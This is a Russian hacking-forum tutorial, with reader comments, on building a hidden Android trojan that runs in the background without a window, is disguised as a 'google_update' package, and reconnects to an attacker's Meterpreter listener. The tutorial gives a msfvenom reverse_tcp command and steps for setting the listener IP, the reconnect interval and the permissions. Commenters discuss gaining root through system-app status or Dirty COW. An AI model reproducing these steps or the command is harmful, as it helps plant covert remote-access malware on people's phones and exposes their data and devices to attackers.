Статья Собираем скрытый троян на Android(persistence) Часть I

Привет с вами DarkNode
Вся инфа в ознокомительных целях,автор не несет ответственности за область ее применения!

Сегодня будем учиться делать скрытый троян|бекдор на андроид средствами разработки на Android Studio и используя исходник от Android Meterpreter Payload с дальнейшим закреплением в системе.

Что нам понадобится:

Android Studio и Android SDK офф_сайт( )
Android Meterpreter Payload source code (https://github.com/giovannicolonna/msfvenom-backdoor-android)
Ссылки так же будут в описании видео

Первый этап (Подготовительный):
Качаем SourceCode(исходник) метерпретора под андроид,ставим андроид студию и SDK (Этот момент я расписывать не буду
если у кого то возникнут трудности - стучитесь в личку)
(При установке SDK вы можете скачать пакеты AVD(Аndroid Virtual Device|Аднроид эмуляторов) для тестирования приложения на эмулированом устройстве,но как по мне то эти эмуляторы очень таки медленные и лучше тестировать на своем реальном девайсе или же использовать другой эмулятор (например genymotion или образы андроида для виртуалок) Ссылки на то как настроить студию с генимоушн или физическим девайсом я кину в конце статьи и в описания видео.
Ну я уже все скачал.Показывать процесс установки не буду.Опять же таки если трудности возникнут с установкой( но не должны))) ) -стучите личку.
Запускаем студию,создаем проект,даем ему имя. Выбираем минимальную версию API андроида,я выбрал IceCreamSandwich 4.0 так как
1.png

2.png

это самая распространенная версия Android по статистике разработчиков.
Выбираем приложения без активити (activity) -- это означает что при запуске не будет никаких
визуальных окон (activity) и приложения просто запуститься себе и будет висеть в фоне.
3.png



На этом подготовительный этап завершен
Подключить genymotion к Android Studio
Подключить реальный смартфон к Android Studio

Второй этап (Базовые настройки пейлоада)
Открываем наш проект в студии.
4.png

Далее распаковываем скаченный архив с гитхаба с исходниками метерпретера. Находим там папку \backdooredapk\ где лежат наши java файлы и перетаскиваем их в наш проект в андроид студии.
5.png

Далее первым шагом же изменим в файле payload.java ip адрес нашего листенера(нашей атакующей машины,где у нас запущен метаслоит)
6.png


Затем нам будет интересен файл MyIntentService.java,в котором мы сможем опционально задать интервал времени через которое наш бекдор будет конектиться к машине атакуищего.
(long half_an_hour = (3600)/(2); //время в секундах между каждой попыткой открыть новую meterpreter сессию " Я для демонстрации поставлю минуту" )
7.png


Далее нам понадобится AndroidManifest.xml из архива. Возьмем от туда пользовательские разрешение (user.permisions) и все что между тегами <application></application>
После того как мы копипасним пермишенс и апликейшн нам нужно будет опционально изменить(указать) имя активити(<activiyt>android:name) и имя службы(<Service>android:name)
8.png

9.png

Хотя студия сама нам это покажет что не нашла пути которое по дефолту был в тегах активити и сервиса(выделит их красным цветом).
Нужно заменить их (stage.metasploit.com на com.darknode.google_update в моем случае "путь(имя) к вашему проекту")

10.png

11.png



Но в манифесте (AndroidManifest.xml) из архива есть один небольшой косяк.После копипаста его в наш проект нужно добавить права(permisions),так как там не полный нужный нам список прав.
Для этого возьмем и реверснем апк созданный с помощью msfvenon:
msfvenom -p android/meterpreter/reverse_tcp lhost=айпи lport=порт r > ./meter.apk(хотя айпи и порт можно рандомный,нам нужен только манифест от туда)
12.jpg

13.jpg


Скопируем разрешение с манифеста в наш проект

14.png


15.png


Далее осталось подписать наше приложения.

16.png


17.png


Подписали) Ну что ж давайте протестим.))
18.png

19.jpg

20.jpg


21.jpg


22.jpg


На этом наш этап пока закончим.Продолжения следует в следующей статье(видео)
Всем спасибо.

 
S

Samad

об этом писали в начале, можешь использовать андроид-сдк, либо эмулятор, к нему прикрутить образ андроида


ну не все так просто, но вот я предлагаю два варианта, либо его системным делать, либо дирти ков провернуть

кстати, что бы рут запрашивал, надо: android.permission.ACCESS_SUPERUSER ?
А как сделать или можете сказать какой код использовать чтоб сделать системным,Пожалуйста
 

elfear

Green Team
03.05.2018
18
15
BIT
0
Прошу прощения за вопрос, но зачем вообще всё это делать, если есть apk файл, который сгенерирован msfvenom?
Зачем вся это возня с android studio?
 

fdgdfgrgfgdf

Green Team
31.03.2017
23
4
BIT
0
Статья огонь, в общем то как обычно. Нет предела совершенству но ты явно к нему ближе многих, жду вторую
 
M

MaxsAlexs

Привет с вами DarkNode
Вся инфа в ознокомительных целях,автор не несет ответственности за область ее применения!

Сегодня будем учиться делать скрытый троян|бекдор на андроид средствами разработки на Android Studio и используя исходник от Android Meterpreter Payload с дальнейшим закреплением в системе.

Что нам понадобится:

Android Studio и Android SDK офф_сайт( )
Android Meterpreter Payload source code (giovannicolonna/msfvenom-backdoor-android)
Ссылки так же будут в описании видео

Первый этап (Подготовительный):
Качаем SourceCode(исходник) метерпретора под андроид,ставим андроид студию и SDK (Этот момент я расписывать не буду
если у кого то возникнут трудности - стучитесь в личку)
(При установке SDK вы можете скачать пакеты AVD(Аndroid Virtual Device|Аднроид эмуляторов) для тестирования приложения на эмулированом устройстве,но как по мне то эти эмуляторы очень таки медленные и лучше тестировать на своем реальном девайсе или же использовать другой эмулятор (например genymotion или образы андроида для виртуалок) Ссылки на то как настроить студию с генимоушн или физическим девайсом я кину в конце статьи и в описания видео.
Ну я уже все скачал.Показывать процесс установки не буду.Опять же таки если трудности возникнут с установкой( но не должны))) ) -стучите личку.
Как SDK установить? Выскакивает вот такая хрень и какой бы путь не указывал пишет ошибка.
 

Вложения

  • 2018-10-22_10-43-25.png
    2018-10-22_10-43-25.png
    3,6 КБ · Просмотры: 606

Antisocial

К удалению 21.01.2019
19.09.2017
3
0
BIT
0
А где запрос на получение User permissions ??? С Андроид версии 6.0 оно просто не будет работать. Поставиться то поставиться но прав не будет ни на что...
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!